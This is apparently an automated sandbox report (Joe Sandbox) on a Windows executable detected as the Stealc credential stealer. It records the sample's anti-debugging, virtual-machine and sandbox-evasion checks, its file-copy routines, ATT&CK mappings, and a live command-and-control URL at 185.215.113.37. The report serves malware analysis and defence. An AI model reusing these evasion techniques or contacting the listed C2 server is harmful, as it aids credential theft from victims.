                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2E59 second address: AB2E5F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4AF2 second address: AB4AF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4AF8 second address: AB4AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4964 second address: AB4968 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4968 second address: AB496E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB6EC5 second address: AB6EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC23D5 second address: AC23DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC23DB second address: AC23F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0C44CFD9B3h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC23F6 second address: AC240D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44C1C9EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC240D second address: AC2411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABE228 second address: ABE22C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABE22C second address: ABE232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABE232 second address: ABE23B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD2028 second address: AD2053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44CFD9B0h 0x00000009 pop eax 0x0000000a pushad 0x0000000b ja 00007F0C44CFD9A6h 0x00000011 jnp 00007F0C44CFD9A6h 0x00000017 push edx 0x00000018 pop edx 0x00000019 jnl 00007F0C44CFD9A6h 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE063E second address: AE0642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE0642 second address: AE065B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push ecx 0x0000000c je 00007F0C44CFD9A6h 0x00000012 push esi 0x00000013 pop esi 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE065B second address: AE065F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE079F second address: AE07AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 je 00007F0C45403116h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE07AB second address: AE07B2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE0914 second address: AE0920 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0C45403116h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE0AA4 second address: AE0AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE0D2E second address: AE0D40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnl 00007F0C45403116h 0x0000000c js 00007F0C45403116h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE0D40 second address: AE0D50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jng 00007F0C45332E1Ch 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE0EA7 second address: AE0EAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE1160 second address: AE1173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jl 00007F0C45332E12h 0x0000000b jne 00007F0C45332E06h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE12B2 second address: AE12B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE12B6 second address: AE12CF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0C45332E06h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007F0C45332E06h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE3FF0 second address: AE4009 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F0C45403116h 0x00000009 ja 00007F0C45403116h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE4009 second address: AE400D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE400D second address: AE4013 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE56D4 second address: AE56E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0C45332E0Eh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE56E8 second address: AE56FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C4540311Ch 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE7372 second address: AE738E instructions: 0x00000000 rdtsc 0x00000002 js 00007F0C45332E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jg 00007F0C45332E06h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6F5A second address: AE6F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C45403121h 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6F70 second address: AE6F7A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0C45332E0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5000359 second address: 50003FE instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0C4540311Fh 0x00000008 and si, 1ADEh 0x0000000d jmp 00007F0C45403129h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov dword ptr [esp], ebp 0x00000019 jmp 00007F0C4540311Eh 0x0000001e mov ebp, esp 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F0C4540311Eh 0x00000027 xor eax, 68FD9A08h 0x0000002d jmp 00007F0C4540311Bh 0x00000032 popfd 0x00000033 push eax 0x00000034 jmp 00007F0C4540311Fh 0x00000039 pop eax 0x0000003a popad 0x0000003b pop ebp 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f pushfd 0x00000040 jmp 00007F0C45403120h 0x00000045 or eax, 14FE0F98h 0x0000004b jmp 00007F0C4540311Bh 0x00000050 popfd 0x00000051 pushad 0x00000052 popad 0x00000053 popad 0x00000054 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A075A6 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A29B37 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A8A8DE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006238B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_006238B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00624910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00624910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0061DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0061E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00624570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00624570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0061ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0061BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0061DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006116D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006116D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00623EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00623EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0061F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00611160 GetSystemInfo,ExitProcess,0_2_00611160
                Source: file.exe, file.exe, 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1876333554.00000000010FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1876333554.0000000001145000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1876333554.0000000001173000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13199
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13196
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13210
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13250
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13215
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006145C0 VirtualProtect ?,00000004,00000100,000000000_2_006145C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00629860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00629860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00629750 mov eax, dword ptr fs:[00000030h]0_2_00629750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00627850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00627850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6636, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00629600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00629600
                Source: file.exe, file.exe, 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 2XProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00627B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00626920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00626920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00627850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00627850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00627A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00627A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.610000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1876333554.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1831952446.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6636, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.610000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1876333554.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1831952446.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6636, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.phpJDfile.exe, 00000000.00000002.1876333554.0000000001145000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/Ufile.exe, 00000000.00000002.1876333554.0000000001157000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37file.exe, 00000000.00000002.1876333554.00000000010FE000.00000004.00000020.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    http://185.215.113.37/9file.exe, 00000000.00000002.1876333554.0000000001157000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.phpObLfile.exe, 00000000.00000002.1876333554.0000000001157000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        185.215.113.37
                        		unknownPortugal
                        		206894WHOLESALECONNECTIONSNLtrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1528224
                        Start date and time:2024-10-07 17:07:09 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 3m 14s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:3
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@1/0@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 80%
                        • Number of executed functions: 19
                        • Number of non-executed functions: 83
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, conhost.exe
                        • Excluded IPs from analysis (whitelisted): 52.149.20.212
                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                        • Not all processes where analyzed, report is missing behavior information
                        • VT rate limit hit for: file.exe

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        xwZfYpo16i.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, StealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        c3KH2gLNrM.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        NHvurkKE21.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        XDPT5mgIBO.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        p7SnjaA8NN.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        8ObkdHP9Hq.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, StealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        MSCy5UvBYg.exeGet hashmaliciousLummaC, Amadey, Stealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php

                        Domains

                        No context

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
